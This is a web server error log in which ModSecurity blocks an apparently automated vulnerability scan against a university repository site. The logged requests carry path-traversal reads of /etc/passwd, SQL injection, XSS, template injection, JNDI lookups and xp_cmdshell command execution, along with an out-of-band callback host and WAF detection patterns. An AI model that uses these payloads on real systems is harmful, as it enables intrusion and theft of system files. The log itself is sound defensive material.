[Tue Aug 29 11:45:01.368280 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAhvjUgAAAAs"]
[Tue Aug 29 11:45:01.378831 2023] [:error] [pid 2107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zcCo-f0AAAg7zGwAAAAJ"]
[Tue Aug 29 11:45:02.441722 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAhlz3UAAAAi"]
[Tue Aug 29 11:45:02.446649 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAg4DeUAAAAI"]
[Tue Aug 29 11:45:03.386961 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAgzySQAAAAF"]
[Tue Aug 29 11:45:05.381364 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhxwk4AAAAv"]
[Tue Aug 29 11:45:05.388381 2023] [:error] [pid 2104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO130cCo-f0AAAg4DewAAAAI"]
[Tue Aug 29 11:45:06.376536 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAhlz3oAAAAi"]
[Tue Aug 29 11:45:07.360907 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAe3@JYAAAAA"]
[Tue Aug 29 11:45:10.405897 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAh3f6oAAAA1"]
[Tue Aug 29 11:45:11.379542 2023] [:error] [pid 2169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAh5RWcAAAA3"]
[Tue Aug 29 11:45:12.407339 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAfiYtoAAAAg"]
[Tue Aug 29 11:45:13.371992 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAc4E4UAAAAP"]
[Tue Aug 29 11:45:15.384282 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAh7wtMAAAA5"]
[Tue Aug 29 11:45:16.421034 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhhcwoAAAAd"]
[Tue Aug 29 11:45:17.365099 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAgzyTkAAAAF"]
[Tue Aug 29 11:45:17.414231 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAfiYuIAAAAg"]
[Tue Aug 29 11:45:19.380978 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhkLfoAAAAh"]
[Tue Aug 29 11:45:20.413410 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAARphK8AAAAU"]
[Tue Aug 29 11:45:23.377159 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAfg78oAAAAe"]
[Tue Aug 29 11:45:24.353115 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO135MCo-f0AAAh7wt8AAAA5"]
[Tue Aug 29 11:45:24.379009 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAfbkxQAAAAZ"]
[Tue Aug 29 11:45:25.380824 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAcsLWcAAAAE"]
[Tue Aug 29 11:45:25.395091 2023] [:error] [pid 2108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAg8a9MAAAAK"]
[Tue Aug 29 11:45:25.400234 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAcsLWgAAAAE"]
[Tue Aug 29 11:45:26.442086 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAhrqIMAAAAo"]
[Tue Aug 29 11:45:27.379078 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAhzvbgAAAAx"]
[Tue Aug 29 11:45:28.464759 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhrqI0AAAAo"]
[Tue Aug 29 11:45:29.395882 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhhcxoAAAAd"]
[Tue Aug 29 11:45:30.394397 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAgzyVEAAAAF"]
[Tue Aug 29 11:45:31.403349 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:docDownloadPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:docDownloadPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/WealthT24/GetImage"] [unique_id "ZO1368Co-f0AAAhrqJMAAAAo"]
[Tue Aug 29 11:45:35.499071 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO1378Co-f0AAAhBSB4AAAAX"]
[Tue Aug 29 11:45:36.595828 2023] [:error] [pid 2108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAg8a@gAAAAK"]
[Tue Aug 29 11:45:43.957199 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gtr7kx461twhx7.oast.site found within TX:1: cjmnbitjmimt14dgn26gtr7kx461twhx7.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAh13z0AAAAz"]
[Tue Aug 29 11:45:47.412210 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAhBSCgAAAAX"]
[Tue Aug 29 11:45:48.564857 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi0JGgAAAAK"]
